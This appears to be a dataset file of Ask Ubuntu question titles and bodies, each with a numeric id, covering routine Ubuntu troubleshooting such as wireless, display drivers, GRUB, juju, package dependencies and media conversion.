65193	why does ubuntu go on disconnection fits ?	got a new router ( netgear dgn2200 ) and wireless performance has been woeful , with disconnection fits happening several times a day - it disconnects out of the blue , and then fails to connect indefinitely - saying authentication timed out , or the firmware crashes and etc . here is a system log demonstrating the frequency of the issue : http : //paste.ubuntu.com/705613/ does anyone have any ideas ? launchpad unfortunately has not been helpful . my wireless card is a mobile one : network controller [ 0280 ] : intel corporation pro/wireless 4965 ag or agn [ kedron ] network connection [ 8086:4229 ] ( rev 61 ) i 've found that killing wpa_supplicant seems to help stop it from looping like that .
65198	do i need to add a boot parameter to work around this kernel power bug on a sony vaio vpc-eh1s0e ?	if i with dmesg | grep -i aspm have this : [ 0.503709 ] acpi fadt declares the system does n't support pcie aspm , so disable it [ 0.673564 ] acpi _osc control for pcie not granted , disabling aspm i 've read that is a bug in the linux kernel and i 've also read that there is a workaround but i do n't know if i have to apply this workaround or not . so do i have to add pcie_aspm=force to grub2 ?
65200	remove gnome shell completely after installing it ?	i wanted to try gnome-shell in 11.10 ( also 12.04 now ) i removed it , however , classic gnome is still there and the battery icon is changed ( too big and ca n't use a icon pack on it like faenza ) also , numerous applications were added and the entries remain on the login screen . how can i remove it completely , rolling back all changes made when installing gnome-shell ?
65208	how do i enable the backlit keyboard on an asus g53sx or g53sw ?	does anyone know how to enable backlit keyboard on asus g53sx ? edit as of feb 18 , 2012 : as qw4z1 mentioned here 's a trick to enable the backlit brightness : su ( enter root password ) echo 0x00050021 > /sys/kernel/debug/asus-nb-wmi/dev_id echo 0x82 > /sys/kernel/debug/asus-nb-wmi/ctrl_param cat /sys/kernel/debug/asus-nb-wmi/devs exit
65211	is it possible to make ubuntu one music respect compilation artist ?	it seems like the ubuntu one music android application does not respect the `` compilation artist '' and just makes a whole album , new for each artist in an album i own ( that is made by many people ) . i have set the `` compilation artist '' to various artists but that does n't cut it .
65213	ubuntu one sign in error ( after installation completed ) : `` nonetype '' object has no attribute `` make file ''	i received this error message when trying to sign in using ubuntu one ( for windows ) . i 'm using windows 7 and just installed ubuntu one for windows . already created an account . `` nonetype '' object has no attribute `` make file ''
65216	how can i run sudo hidd -- search without a password ?	if i run hidd -- search it says hid create error 13 ( permission denied ) if i run as sudo it connects fine . i want this script to run on login . i saw how to edit sudoers , but will it create a security weakness if i add % myname all = nopasswd : /usr/bin/hidd is there a group i can add myself to that means i can run this command without sudo ?
65219	how do i set an external monitor as default ? ( or move unity bar to monitor at least )	i 'm using ubuntu 11.04 natty on an hp laptop and i can not figure out how to get unity on the external monitor ! i have my desk set up with my monitor in front of me , and my laptop working as a secondary about 45 degrees on the left . i 've tried a few different suggestions , including trying ( and not being able to find ) nvidia-settings . but as i am a relatively new linux user , i am having a lot of difficulties understanding what i 'm being instructed to do .
65224	unable to change iso properties	whenever i mount an iso file and wants to change the properties of some files in the iso , ( i.e . make a file executable ) i always fail to do so . nautilus would n't work , as soon as u click on the make executable option , the tick disappears instantly , this does n't work in terminal as well ( i 've tried chmod +x ) any ideas ?
65228	how do i remove an extension from libreoffice 3 ?	i click the remove button , but nothing happens ... is there any way to remove an extension ? i have 3 to get rid of .
65234	how can i load xml through mysql ?	on windows ( r ) i can this statement to load xml data in the database load xml local infile 'c : /users/yourname/desktop/myfile.xml' into table mytable rows identifed by ' < product > ' but , i can not seem to accomplish this on ubuntu 11.2.0 with the latest version of mysql communiuty server installed . this is the statement i use for my ubuntu setup . load xml local file '/home/ryan/tech.xml' into table `t` rows identified by ' < product > ' ; so my question is , where do i put the xml files on my web server if i want to access them with mysql ?
65236	where can i find a driver for the epson al-mx14 all-in-one printer ?	i 've tried searching for the epson mx14 driver on google but nothing turns up . i get similar model numbers , but nothing exact . these drivers did n't work . i click on 'system settings ' - 'printing ' - 'add ' - 'windows printer via smb'- then browse the lan and successfully find the correct printer ( epson al-mx14 ) i click ok , ubuntu throws up a list of brands , and the printer is n't found among the options . i instead choose to install a generic driver . i am prompted to print a test page , which yields the message `` cups server error . there was an error during the cups operation : 'client-error-document-format-not-supported . ' '' has anyone overcome this problem before ?
65239	is it possible / avaliable to upgrade to mysql 5.5	upgrade to mysql version 5.5 ? if so . it is not in the synaptics package manger .
65244	how can i play windows games in ubuntu 11.04 ?	currently i am using ubuntu 11.04 and i have tried installing windows games with wine , but some games like nfs require the latest version of directx . what should i do to play games in ubuntu ?
65245	apt-get update only for a specific repository	when i add a ppa and i want to install some of its content is quite annoying to re-update all my apt list using apt-get update is it instead possible to only sync the content of a given repository ?
65246	is there a reiser4 patched kernel available somwhere ?	i 'd like to experiment with this filesystem . i do n't want to argue the why and wherefores i was just wondering if a pre patched kernel was available anywhere ?
65248	ecryptfs : input/output error	my home directory is encrypted using ecryptfs . i have recently started getting i/o errors when i try to access some files on that file system : aix @ aix : ~/.evolution/mail/imap/acct/folders/inbox $ cat 130395.header cat : 130395.header : input/output error /var/log/messages has the following to say : oct 11 11:05:38 aix kernel : [ 138537.991670 ] either the lower file is not in a valid ecryptfs format , or the key could not be retrieved . plaintext passthrough mode is not enabled ; returning -eio two questions : how do i fix this ? how do i prevent this happening in the future ? i 'm using ubuntu 10.10 .
65251	how to install missing gnome3/ gnome shell applications ( documents , web apps , sushi , etc . ) ?	i waited to install gnome 3 , shell etc on ubuntu , using it on debian and fedora in the meantime , because it was `` going to be straightforward '' on oneiric . now i find that the repos only contain part of the full gnome 3 environment , some packages are out of date , and the bits that do exist have often been hacked in order to make them work with unity . as a test , i installed the whole system from the upstream source code on a test machine . works great , but just like 11.04 , unity no longer works . is it ever going to be possible to have a full gnome 3 experience on ubuntu or will it always be made to suck in order to avoid comparison with unity ?
65256	ways to setup ubuntu	i just finished building my computer for the first time and i 'm hoping to run ubuntu or at least a linux dist on it . currently i have windows 7 installed on my computer and my question is that how should i install ubuntu ? i have my w7 installed on my 128gb ssd and i have two 1tb hdd ; one for progams and the other one for regular files . should i install it with windows on the ssd ? install it on a hdd ? or how does dual boot work ? install it on a usb ? what 's a good way to install ubuntu for a person that is completely new to linux like me ? sorry if i sound ambiguous , i 'd be happy to provide more information if needed .
65257	how do i perform easy switching to external monitor	i am currently changing between my laptop and my external monitor with the nvidia x server settings program and i 'm sure i 'm doing it in a really dumb way : i currently select the external monitor , set it from `` disabled '' to `` twinview '' , then then select the laptop screen and change it to `` disabled '' . then i press `` apply '' and it 's done . i do this in reverse when i need to disconnect . it 's the only way i 've managed to switch monitors ( both vga and displayport connections on my thinkpad ) , and it 's a really fiddly process which i have to perform multiple times per day . however i really want to be able to switch with fn-f8 or some other keyboard shortcut but this does n't appear to work with any connection method . is there anything better than i can do ?
65258	unable to connect my computer from lan ( http , smb )	i installed ubuntu 10.04 , apache , php , mysql , smb . everything work fine in locally in my ip . when i trying to access my computer from lan ( other computer ) , it shows unable to connect . when i ping my ip from remote computer , its pinging ok . i can access internet , and all other systems ( http , smb ) . but the problem is no one ca n't access my computer remotely in my lan network . my ip is 192.168.85.105 and i want access ( appaceh , smb ) from 192.168.85.10 . is there any proxy firewall settings ? when i re-starting the system the same problem still exist.the system correctly ping from remote host.i have executed the above commands.initially i run the command `` sudo iptables -f '' its okey in first time . now its not working , please assist me ... [ output of iptables -- list is given ] ** ashok @ ashok-desktop : ~ $ sudo iptables -- list [ sudo ] password for ashok : chain input ( policy drop ) target prot opt source destination accept tcp -- resolver1.opendns.com anywhere tcp flags : ! fin , syn , rst , ack/syn accept udp -- resolver1.opendns.com anywhere accept all -- anywhere anywhere accept icmp -- anywhere anywhere limit : avg 10/sec burst 5 drop all -- anywhere 255.255.255.255 drop all -- anywhere 192.168.85.255 drop all -- base-address.mcast.net/8 anywhere drop all -- anywhere base-address.mcast.net/8 drop all -- 255.255.255.255 anywhere drop all -- anywhere 0.0.0.0 drop all -- anywhere anywhere state invalid lsi all -f anywhere anywhere limit : avg 10/min burst 5 inbound all -- anywhere anywhere log_filter all -- anywhere anywhere log all -- anywhere anywhere log level info prefix `unknown input ' chain forward ( policy drop ) target prot opt source destination accept icmp -- anywhere anywhere limit : avg 10/sec burst 5 log_filter all -- anywhere anywhere log all -- anywhere anywhere log level info prefix `unknown forward ' chain output ( policy drop ) target prot opt source destination accept tcp -- 192.168.85.105 resolver1.opendns.com tcp dpt : domain accept udp -- 192.168.85.105 resolver1.opendns.com udp dpt : domain accept all -- anywhere anywhere drop all -- base-address.mcast.net/8 anywhere drop all -- anywhere base-address.mcast.net/8 drop all -- 255.255.255.255 anywhere drop all -- anywhere 0.0.0.0 drop all -- anywhere anywhere state invalid outbound all -- anywhere anywhere log_filter all -- anywhere anywhere log all -- anywhere anywhere log level info prefix `unknown output ' chain inbound ( 1 references ) target prot opt source destination accept tcp -- anywhere anywhere state related , established accept udp -- anywhere anywhere state related , established lsi all -- anywhere anywhere chain log_filter ( 5 references ) target prot opt source destination drop tcp -- anywhere anywhere tcp dpt : hkp drop udp -- anywhere anywhere udp dpt : hkp chain lsi ( 2 references ) target prot opt source destination log_filter all -- anywhere anywhere log tcp -- anywhere anywhere tcp flags : fin , syn , rst , ack/syn limit : avg 1/sec burst 5 log level info prefix `inbound ' drop tcp -- anywhere anywhere tcp flags : fin , syn , rst , ack/syn log tcp -- anywhere anywhere tcp flags : fin , syn , rst , ack/rst limit : avg 1/sec burst 5 log level info prefix `inbound ' drop tcp -- anywhere anywhere tcp flags : fin , syn , rst , ack/rst log icmp -- anywhere anywhere icmp echo-request limit : avg 1/sec burst 5 log level info prefix `inbound ' drop icmp -- anywhere anywhere icmp echo-request log all -- anywhere anywhere limit : avg 5/sec burst 5 log level info prefix `inbound ' drop all -- anywhere anywhere chain lso ( 0 references ) target prot opt source destination log_filter all -- anywhere anywhere log all -- anywhere anywhere limit : avg 5/sec burst 5 log level info prefix `outbound ' reject all -- anywhere anywhere reject-with icmp-port-unreachable chain outbound ( 1 references ) target prot opt source destination accept icmp -- anywhere anywhere accept tcp -- anywhere anywhere state related , established accept udp -- anywhere anywhere state related , established accept all -- anywhere anywhere please give me the solution .
65263	shortcut to select a terminal-window ?	i like to use ctrl-alt + numpad-keys to align 4 terminal windows on one monitor ( one in each corner of the screen ) . is there a way ( shortcut ) to quickly make a particular one active for typing without clicking the window active with the mouse ? system : ubuntu 11.04/default unity desktop
65264	what 's the recommended way to install wordpress from packages on a server ?	i 've got a lamp server available from http : //91.xxx.xx.xx/ ( just an example ip address ) , and i 'd like to install wordpress there . i 've gone as far as doing a simple sudo apt-get install wordpress to install wordpress , but i 'm not too sure about the set of best-practice steps after that . i 've read the documentation to install wordpress in the ubuntu wiki , but it is out-of-date . also i could n't figure it out from the /usr/share/doc/wordpress/readme.debian provided in the wordpress package . here are some additional notes of what i 'm trying to do with the site : the server is running ubuntu 10.04 lts wordpress and any other software required should be installed from packages from the official ubuntu repositories i 'm not planning to use juju wordpress should be available from http : //91.xxx.xx.xx/ directly ( i.e . not from http : //91.xxx.xx.xx/blog or http : //91.xxx.xx.xx/wordpress ) i 'd appreciate any help with the clear set of recommended steps after the initial installation of the wordpress package to get the site up and running , as there 's lots of info out there , but it seems to be out-of-date .
65269	checking if the latest version are installed in the system	i am using ubuntu 11.10 and now and then compiz crashes . so apport reported the bug to launchpad ( https : //bugs.launchpad.net/ubuntu/+source/nux/+bug/872223 ) . it tells me that i have some outdated packages installed . outdated debug symbol package for libtiff4 : package version 3.9.5-1ubuntu1 dbgsym version 3.9.4-5ubuntu6 outdated debug symbol package for libthai0 : package version 0.1.15-2 dbgsym version 0.1.14-2ubuntu1 outdated debug symbol package for libdatrie1 : package version 0.2.4-3 dbgsym version 0.2.4-1 outdated debug symbol package for libltdl7 : package version 2.4-2ubuntu1 dbgsym version 2.2.6b-2ubuntu3 outdated debug symbol package for libstartup-notification0 : package version 0.12-1 dbgsym version 0.10-1build1 now considering i am running the latest version of ubuntu , i do not understand why i would have outdated packages . i checked the software sources where it is selected to receive all updates as can be seen in the screenshot . why is this ?
65272	can calculator show decimal as fraction ?	some calculators can show a decimal as a fraction if applicable . eg . 1.333333 - > 1r1r3 on my calculator ( hardware ) representing \ $ 1 \frac { 1 } { 3 } \ $ . can the built in calculator do that ? if not which ( software ) can ? * whats wrong with my math ?
65276	access to network files under \\directory	i was doing start - run - '\\myfiles ' under windows xp and had access to some file directories over my network . i dont know how to do the same thing under ubuntu .
65281	how to recover/reset forgotten gnome keyring password ?	i am on ubuntu and i have forgotten the password for my gnome keyring ( yes , stupid me , i know ) . any way i can get it back ? i have already looked at this link , but it says it 's not possible if my home directory is encrypted and unfortunately my home directory is encrypted .
65282	command-line equivalences of some tasks in synaptic	i already use apt-get for most of my package management . yet , there are times when i occasionally need to use synaptic to do certain things . i would like to learn the equivalent commands for doing the following things in synaptic : check a package 's dependencies / dependent packages . ( this can be done in synaptic by viewing the properties of a package ) . browse available packages search ( in package names as well as the details/descriptions ) for some key . ( the search function at the top of synaptic ) check if a package is installed or not also , is there a way to find packages that are no longer necessary ( e.g . a package no longer in use because i removed a dependency ) . i have a feeling my system is terribly bloated because i removed certain programs and not all the dependencies went with them .
65283	quickly application with liststore as preference	i 'm starting to write a program with 'quickly ' . a list of desired languages will be one prefereces . example : languages = [ `` en '' , `` de '' ] the ( automaticly created ) quickly code that handles the preference part looks like this : # define your preferences dictionary in the __init__.main ( ) function . # the widget names in the preferencestestprojectdialog.ui # file need to correspond to the keys in the preferences dictionary . # # each preference also need to be defined in the 'widget_methods ' map below # to show up in the dialog itself . provide three bits of information : # 1 ) the first entry is the method on the widget that grabs a value from the # widget . # 2 ) the second entry is the method on the widget that sets the widgets value # from a stored preference . # 3 ) the third entry is a signal the widget will send when the contents have # been changed by the user . the preferences dictionary is always up to # date and will signal the rest of the application about these changes . # the values will be saved to desktopcouch when the application closes . # # todo : replace widget_methods with your own values widget_methods = { 'languages ' : [ 'getter ' , 'setter ' , 'changed ' ] , } in the gui , it seems as if the widget of choice in gtk for a list is a liststore ( which is n't a widget , but a model , but it 's defined in the glade file ... ) . can someone tell me what would work for a liststore for the'getter ' , 'setter ' and 'changed ' in the code above ? the approach looks easy for simple entry widgets and such , but i do n't know how to use it with lists . alternatively , i would of course accept any other way to deal with lists as preferences , provided that the length of the list is not fixed .
65296	nautilus/samba mount problem	on a laptop with ubuntu 10.04 , i have several nautilus bookmarks to mount various windows ( 7 and 2003 ) shares on my home network , accessed thru openvpn . i have full rights to all of these shares , and until recently i was able to mount them via nautilus and read/write them fine . now i still mount fine , but all seem to be ro now . when browsing one of the shares in nautilus , paste is greyed out , and any file i attempt to drag/drop on the share `` bounces '' back and does not copy/move . i can , however , from a shell go to the .gvfs folder the share is mounted at , and am able to read/write via the command line just fine . i can also mount the shares via `` mount -t cifs '' just fine from the command line , and access is normal . it appears nautilus is blocking writes to any of these shares . what 's changed ? ? help ! ! dave
65301	run external commands from scribes	can i run external commands from scribes ? i 'm looking for functionality similar to gedit 's external tools . i would like to be able to run an arbitrary command from scribes via a chosen key command , e.g . to run latexmk on the current file when i press ctrl+0 .
65303	dependency problem for pdftk	under ubuntu 11.04 , when i try to install pdftk via apt-get or synaptic , i get the following error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : pdftk : depends : libgcj-bc ( < 4.6~ ) but 4.6.0-7ubuntu1 is to be installed e : broken packages i know pdftk works just fine on ubuntu on previous versions . how can i fix the dependencies so that i can now install pdftk ?
65305	will ubuntu one be available in spanish ?	¿ estará disponible ubuntu one en español ? tanto la web , como los foros y las faqs están en inglés solamente , al parecer . gracias por su generoso esfuerzo e invaluable trabajo . pd : uso la versión 11.04 natty narval de ubuntu . will ubuntu one ( the web front-end ) , faqs and forums , etc. , be available in spanish ? thanks for your invaluate work and effort . p.s : i use ubuntu version 11.04 natty narwhal
65317	dual screen not working with a nvidia binary driver	i just checked out the new ubuntu 11.10 beta 2 64bit and i ca n't get my second screen to work . it worked with kubuntu 11.04 ( with binary drivers and with the drivers from nvidia website though not with the latest kernel , but i never checked why it was acting up before ) and works with windows . i installed the nvidia current driver from the 'additional driver ' tool and rebooted which did n't change anything . i then used the nvidia-settings tool and my second screen is marked as 'disabled ' . when i enable it as twin-view , the resolution is set automatically but when i hit 'apply ' , the following happens . the image is mirrored on both screens the image is scrambled the image is only shown at the bottom lower half of the screen after some time ( i suspect the confirm settings dialog with a time-out ) the screen becomes black and only the mouse pointer is shown . it can be moved , but sluggishly . i then have to kill the session from tty . i installed the drivers from the nvidia website but they did the same thing . ( and after 3 tries the system was so mixed up with nouveau and binary drivers that x would n't start and i had to restore my system from command line . )
65318	keyboard shortcuts not working in gnome-shell 3.2 ?	i was wondering if keyboard shortcuts ( like alt+f1 , alt+f2 ) support is removed from gnome shell 3.2 ? if not then i 'm missing something as i ca n't seem to use them .
65321	characteristics of unity and gnome3 for the end user	since ubuntu 11.10 will support both ( unity by default and gnome3 after installing it from the repos ) i was wondering what characteristics do each of them offer for the end user . what changes can an end user perceive that will help he/she accomplish tasks . basically what do each offer to the end user to make their desktop experience better . this can help in knowing a little more about each of them in a way of comparing .
65323	bulk export/embed album art in banshee	i have a well structured music library in banshee . i used to just use folders for years so i 've always been pretty good at maintaining a strict filing system . i say this not to brag ( it did waste a lot of my time , after all ) but to explain that my end-game should be possible . until banshee , i never really had any use for album art so when i started using it , i used its album art finder to ( painstakingly ) go through all 8000-odd albums . my understanding is that banshee has these files scrobbled away in a cache directory somewhere with a meaningless name attached to them . i 've recently moved into the world of the squeezebox . it 's awesome but i 'm having problems getting it to see the existing album art because banshee has it locked away in its own directories rather than putting it in the `` right '' place . so i 'm looking for one of two solutions , both parsing banshee 's database to : preferred : copy the art file out as /artist/album/cover.jpg ( the squeezebox server will understand this ) . embed the art into each mp3/flac/ogg/etc ( this requires all formats to support blob metadata ) edit : just found all the art in ~/.cache/media-art with names like album-f952aa94b80de0b31b8979d70d5605e2.jpg as i suspected . if there 's a good way of correllating `` f952aa94b80de0b31b8979d70d5605e2 '' to an artist , that 's what i 'm really after .
65324	is it a good idea to install gedit in lubuntu ?	i 've been a ubuntu user for years now , but since 11.10 will come with gnome3/unity , neither of which i like , i 've decided to switch to lubuntu , which uses lxde as the desktop environment . the only problem i 've come up with so far is that the default text editor , leafpad , does n't support syntax highlighting . so far i 've been using gedit for coding ( html/php ) , i 've customized it pretty nicely to work for what i need . leafpad , however , is not customizable at all . thus , i ask : is it a good idea to install gedit in lubuntu ? i know it works , because i tried and all was simple , but since gedit is a gnome app , i 'm not certainly sure whether by using it i 'm not breaking the overall system performance ( by adding the `` gnome '' part into the system ) . edit what packages are listed when you try to install it in lubuntu ? can you share the list ? ubuntu @ ubuntu : ~/desktop $ sudo apt-get install gedit reading package lists ... building dependency tree ... reading state information ... the following extra packages will be installed : gedit-common gir1.2-gtksource-3.0 gir1.2-peas-1.0 libgtksourceview-3.0-0 libgtksourceview-3.0-common libpeas-1.0-0 libpeas-common zenity zenity-common the following new packages will be installed : gedit gedit-common gir1.2-gtksource-3.0 gir1.2-peas-1.0 libgtksourceview-3.0-0 libgtksourceview-3.0-common libpeas-1.0-0 libpeas-common zenity zenity-common 0 upgraded , 10 newly installed , 0 to remove and 367 not upgraded . need to get 1,425 kb of archives . after this operation , 11.5 mb of additional disk space will be used . do you want to continue [ y/n ] ?
65325	remote desktop viewer ca n't connect to `` found '' computers	i use remote desktop viewer to connect from my laptop ( ubuntu 11.04 ) to my pc ( ubuntu 10.04 ) . but i can only connect if i type the pc 's address directly . if i use the find option ( upnp ? ) , to search for visible computers on the network , it finds the pc . yet when i select it , the remote desktop viewer immediatly turns off . no error messages . since the pc has no static ip , i have to check every time what the current ip address is , so having it found by the rdv would be great . btw , i am using the default rd apps that ubuntu brings . update i just started it through a terminal and the result was segmentation fault .
65331	how to convert a m4a sound file to mp3 ?	i tried with : $ ffmpeg -i music.m4a music.mp3 but i got a zero bytes file . the output was : ffmpeg version 0.6-4:0.6-2ubuntu6.2 , copyright ( c ) 2000-2010 the ffmpeg developers built on sep 16 2011 17:11:24 with gcc 4.4.5 configuration : -- extra-version=4:0.6-2ubuntu6.2 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- enable-shared -- disable-static warning : library configuration mismatch libavutil configuration : -- extra-version=4:0.6-2ubuntu6.2 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavcodec configuration : -- extra-version=4:0.6-2ubuntu6.2 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavformat configuration : -- extra-version=4:0.6-2ubuntu6.2 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavdevice configuration : -- extra-version=4:0.6-2ubuntu6.2 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavfilter configuration : -- extra-version=4:0.6-2ubuntu6.2 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libswscale configuration : -- extra-version=4:0.6-2ubuntu6.2 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libpostproc configuration : -- extra-version=4:0.6-2ubuntu6.2 -- prefix=/usr -- enable-avfilter -- enable-avfilter-lavf -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-vaapi -- enable-pthreads -- enable-zlib -- enable-libvpx -- disable-stripping -- enable-runtime-cpudetect -- enable-gpl -- enable-postproc -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/i686/cmov -- cpu=i686 -- enable-shared -- disable-static -- disable-ffmpeg -- disable-ffplay libavutil 50.15 . 1 / 50.15 . 1 libavcodec 52.72 . 2 / 52.72 . 2 libavformat 52.64 . 2 / 52.64 . 2 libavdevice 52 . 2 . 0 / 52 . 2 . 0 libavfilter 1.19 . 0 / 1.19 . 0 libswscale 0.11 . 0 / 0.11 . 0 libpostproc 51 . 2 . 0 / 51 . 2 . 0 input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from 'music.m4a ' : metadata : major_brand : m4a minor_version : 0 compatible_brands : m4a mp42isom duration : 00:00:03.41 , start : 0.000000 , bitrate : 66 kb/s stream # 0.0 ( und ) : audio : aac , 44100 hz , mono , s16 , 63 kb/s output # 0 , mp3 , to 'music.mp3 ' : stream # 0.0 ( und ) : audio : 0x0000 , 44100 hz , mono , s16 , 64 kb/s stream mapping : stream # 0.0 - > # 0.0 encoder ( codec id 86017 ) not found for output stream # 0.0
65335	software center stops	when i wan na see the list of installed applications or search for a new one , the panels changes to blank white and stops there with waiting mouse cursor ! and synaptic give an error on one of the repositories and leaves ( nautilus elementary ) the relevant source file has only one word in it 'ain ' which is mentioned in the error by synaptic . should i delete or change it into comment in the file ? if so how ?
65337	how to ssh to a running x instance remotely ?	i have an x instance running on my server computer , and on occasion i connect to it remotely via teamviewer . once in a while teamviewer crashes and i can not restart it remotely . is there a way to login to my running x instance through ssh , and restart teamviewer remotely ?
65341	will evolution still be included as an option ?	i see that evolution is going to be replaced as the default email client by thunderbird ... i use thunderbird for my personal email , but i have evolution set up to access my choir 's imap email server , send out newsletters etc . will evolution still be included as an option in 11.10 and following ? or will updating to 11.10 scrub my evolution install ? if the latter i will refuse the upgrade . please advise immediately .
65343	can not change file name on desktop	i can not change the name of a file/directory on the desktop through right click on the icon . the name becomes selected , but i can not type in it . this has also happened in the past with some versions of ubuntu . is this a bug , or am i not doing it correctly ?
65344	how to force grub to boot only the 1st os ?	good evening , i 'm running the lastest ubuntu server edition ( i like the : apt-get update/upgrade ; command ... a lot ) and i need grub to boot only the 1st ubuntu server image ( every time ) . the grub menu displays : 2 server images and 1 memory tests and 1 extra os from a second attached hdd these 4 can be found listed in /boot/grub/grub.cfg ( i m thinking of deleting the other entries but i ve read that the .cfg file is generated automatically if i add/remove kernel ) can i set a grub_savedefault=true command in the /etc/default/grub ? https : //help.ubuntu.com/community/grub2 # reinstalling % 20grub2 or does that not apply to my configuration ? ps . i think grub pops up because i have often power losses , but i still want grub to load the ubuntu os ... since it s sole purpose is to be a server and local access is limited .
65346	dash not displaying properly	i can only get unity to display properly at a lower ( ugly-looking ) resolution . is there a way to fix this . i can not go full screen . i can not find any bug reports that have similar problems . i have blacklisted intel_ips because it had failed to i915 symbols . this is common problem in linux and the solution on many websites and bug reports ( which has worked up until now ) is to blacklist intel_ips . i am using a gateway laptop . 64 bit oneiric ocelot fully updated . installed from the daily build yesterday . this problem is not present when intel_ips is not blacklist and i resume normal boot from grub2 menu . but i can not get a higher resolution than 1440x900 and the native resolution 1600x900 . i can not post images because of the spam mechanism thing but basically there is a second dash menu that tries to show and they interlap and there is no fullscreen corner button at the bottom . lshw -c video *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 18 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:41 memory : f0000000-f03fffff memory : d0000000-dfffffff ioport:1800 ( size=8 )
65351	autotype abbreviations	i 've been using autohotkey for windows to have some handy scripts , e.g . auto type some templates : ttyl = > thanks , talk to you later is there any app for ubuntu to expand abbreviations like this way in any application ?
65355	how long will ubuntu classic be supported by ubuntu ? i.e . is it deprecated ?	i prefer no-frills ubuntu classic ( no effects ) to the new ubuntu unity desktop . i 'm glad it 's still an option in ubuntu 11.04 . but will ubuntu keep offering the option of logging into ubuntu classic for the indefinite future , or is it going to be phased out ? is there an official pronouncement on this ?
65359	how do i configure juju for local usage ?	i 'm too cheap to pay for ec2 , and i do n't have enough servers to set up my own openstack , how do i configure juju to use linux containers ( lxc ) on something like my laptop ?
65363	udev not running remove events	i have two rules one for when a device , my phone , is connected and one for when it is disconnected . the rule for add runs the remove rule does not . here is my udev rule . i simplified but the remove event does not run . # runs : kernel== '' sd ? 1 '' , attrs { idvendor } == '' 0bb4 '' , attrs { idproduct } == '' 0ff9 '' , symlink+= '' phone '' , action== '' add '' , run+= '' /usr/bin/touch /tmp/udev.add '' # does not run : kernel== '' sd ? 1 '' , attrs { idvendor } == '' 0bb4 '' , attrs { idproduct } == '' 0ff9 '' , symlink+= '' phone '' , action== '' remove '' , run+= '' /usr/bin/touch /tmp/udev.remove '' why would one run but not the other ?
65364	how can i configure multiple deployment environments for juju ?	i want to be able to deploy charms both locally and to ec2 . what 's an example environments.yaml that has both entries ? and how can i switch between them so i can just deploy to ec2 and/or lxc ?
65365	is there a help lens in 11.10 ?	i read from somewhere about a help lens in the dash with ask ubuntu and othere recommended ubuntu support sites for users in 11.10 . is this really true or was it a tweak ?
65369	what are differences between a lens and scope ?	well it seems those two terms are the most popular ones since 11.04 . what truly are the differences and similarities between them ( lenses and scopes ) ?
